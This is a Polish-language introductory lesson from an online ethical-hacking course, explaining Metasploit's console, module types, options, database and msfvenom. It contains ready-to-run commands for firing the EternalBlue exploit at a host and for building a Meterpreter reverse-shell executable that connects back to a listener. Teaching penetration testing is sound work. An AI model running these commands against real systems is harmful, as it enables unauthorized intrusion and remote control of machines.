Architektura Metasploit
Moduły i konsola
Architektura Metasploit to bezpłatna lekcja Ethical Hacking Academy na CoddyKit. To lekcja 1 z 4. Możesz przeczytać całą lekcję poniżej za darmo — a potem ćwiczyć ją interaktywnie w przeglądarce z wbudowanym edytorem kodu i tutorem AI dostępnym 24/7. To część ścieżki edukacyjnej Ethical Hacking Academy, a Twój postęp synchronizuje się między webem a aplikacją CoddyKit. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.
Czym jest Metasploit?
Metasploit to najczęściej używany framework do wykorzystywania luk. Udostępnia uporządkowaną bibliotekę exploitów, payloadów i narzędzi służących do testowania i prezentowania podatności podczas autoryzowanych działań.
Zamiast pisać każdy atak od podstaw, można wczytywać sprawdzone moduły, konfigurować je i uruchamiać za pośrednictwem spójnego interfejsu.
msfconsole
Podstawowym interfejsem jest msfconsole — interaktywna powłoka wiersza poleceń. Oferuje uzupełnianie za pomocą klawisza Tab, historię poleceń i dostęp do każdego modułu.
Uruchamia się ją z terminala, a następnie całą pracę wykonuje się w jej wierszu poleceń.
msfconsole
# msf6 > helpTypy modułów
Metasploit organizuje funkcje w typy modułów:
- exploit: kod wykorzystujący podatność.
- payload: kod uruchamiany na celu po wykorzystaniu podatności.
- auxiliary: skanery, fuzzery i narzędzia, które nie dostarczają payloadu.
- post: działania po wykorzystaniu podatności na przejętym hoście.
- encoder i nop: pomagają payloadom omijać wykrywanie.
Nazewnictwo modułów
Moduły używają hierarchicznej ścieżki, która dokładnie informuje, do czego służą. Odczytanie ścieżki ujawnia typ, platformę i usługę docelową.
exploit/windows/smb/ms17_010_eternalblue
# type / platform / service / specific exploitExploity a payloady
Ważne rozróżnienie:
- Exploit to sposób wejścia; przełamuje zabezpieczenia podatnego oprogramowania.
- Payload określa, co ma się wydarzyć po uzyskaniu dostępu, na przykład otwarcie powłoki.
Łączy się je w pary: jeden exploit może dostarczać wiele różnych payloadów, zależnie od celu i systemu docelowego.
Przebieg pracy z modułem
Praca z dowolnym modułem przebiega według powtarzalnego cyklu:
- search — wyszukaj moduł.
- use — wczytaj go.
- Ustaw options, takie jak RHOSTS i LHOST.
- run lub exploit — uruchom moduł.
Ta spójność sprawia, że framework można skalować do tysięcy modułów.
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.10.5
exploitMagazyn danych i opcje
Ustawienia modułów znajdują się w magazynie danych (datastore). Każda opcja może być wymagana lub opcjonalna.
- RHOSTS: zdalny adres lub zdalne adresy celu.
- RPORT: port zdalny.
- LHOST: adres nasłuchiwania dla połączeń zwrotnych.
- LPORT: port nasłuchiwania.
Przed uruchomieniem należy użyć show options, aby sprawdzić wymagania modułu.
Baza danych
Metasploit integruje się z bazą danych PostgreSQL w celu przechowywania hostów, usług, danych zdobyczy i danych uwierzytelniających wykrytych podczas działań. Umożliwia to sprawne śledzenie dużego zakresu testów.
Bazę należy uruchomić przed uruchomieniem konsoli, aby wyniki były zapisywane automatycznie.
msfdb init
# Inside msfconsole:
# db_status hosts services credsModuły pomocnicze
Moduły auxiliary wykonują użyteczne działania bez wykorzystywania podatności: skanowanie portów, enumerację usług, brute force logowania i fuzzing.
Często są pierwszym krokiem, ponieważ gromadzą informacje potrzebne przed wybraniem exploita.
use auxiliary/scanner/smb/smb_version
set RHOSTS 10.10.10.0/24
runmsfvenom
msfvenom to narzędzie towarzyszące służące do generowania samodzielnych payloadów jako plików: plików wykonywalnych, skryptów lub shellcode'u dostarczanego poza konsolą.
Łączy generowanie payloadów i kodowanie w jednym poleceniu, co jest przydatne podczas symulacji phishingu lub niestandardowego dostarczania w autoryzowanych testach.
msfvenom -p windows/meterpreter/reverse_tcp \
LHOST=10.10.14.2 LPORT=4444 -f exe -o shell.exeObszary robocze
Podczas wielu działań obszary robocze Metasploit utrzymują hosty, usługi i dane zdobyczy każdego klienta w odizolowanych obszarach bazy danych. Można przełączać się między nimi, dzięki czemu dane nie przenikają między ocenami.
workspace -a clientA # add a workspace
workspace clientA # switch to it
workspace # list allSzybkie sprawdzenie
Sprawdź swoją znajomość typów modułów.
Podsumowanie
Dowiedziałeś się, jak zbudowany jest Metasploit:
- msfconsole to główny interfejs; msfvenom tworzy samodzielne payloady.
- Typy modułów: exploit, payload, auxiliary, post, encoder/nop.
- Ścieżki modułów kodują typ, platformę i usługę.
- Przebieg pracy: search, use, set options, run; ustawienia znajdują się w datastore.
- Baza danych PostgreSQL śledzi hosty, usługi i dane zdobyczy.
Dalej: skuteczne wyszukiwanie exploitów i korzystanie z nich.
Często zadawane pytania
Czy lekcja „Architektura Metasploit” jest bezpłatna?
Tak — pełny tekst „Architektura Metasploit” jest dostępny za darmo tutaj w sieci. Aby ćwiczyć ją interaktywnie (wbudowany edytor kodu i tutor AI dostępny 24/7) i odblokować resztę kursu Ethical Hacking Academy, przejdź na CoddyKit PRO. Kurs Ethical Hacking Academy zawiera 4 lekcji w sumie.
Co nauczysz się w „Architektura Metasploit”?
Moduły i konsola Ćwiczysz Ethical Hacking Academy z praktycznym kodem, który uruchamiasz bezpośrednio w przeglądarce, a tutor AI dostępny 24/7 odpowiada na Twoje pytania podczas pracy nad lekcją.
Czy potrzebuję doświadczenia, aby zacząć Ethical Hacking Academy?
Nie wymagamy żadnego doświadczenia. Ethical Hacking Academy w CoddyKit jest strukturyzowany dla początkujących i zaawansowanych użytkowników, więc możesz zacząć tutaj lub od początku i uczyć się w swoim tempie. To lekcja 1 z 4.
Ile czasu zajmuje lekcja „Architektura Metasploit”?
Większość lekcji CoddyKit trwa około 5–10 minut. Każda lekcja to mały, interaktywny krok, dzięki czemu robisz systematyczne postępy i zawsze wracasz dokładnie do tego samego miejsca — na webie i w aplikacji.
Czy mogę pisać i uruchamiać kod w tej lekcji Ethical Hacking Academy?
Tak. Każda lekcja Ethical Hacking Academy zawiera wbudowany edytor kodu, więc piszesz i uruchamiasz prawdziwy kod bezpośrednio w przeglądarce i od razu otrzymujesz sprzężenie zwrotne od AI — bez konfiguracji na komputerze.
Wszystkie lekcje w tym kursie
- Architektura Metasploit
- Wyszukiwanie i używanie exploitów
- Payloady i Meterpreter
- Moduły po uzyskaniu dostępu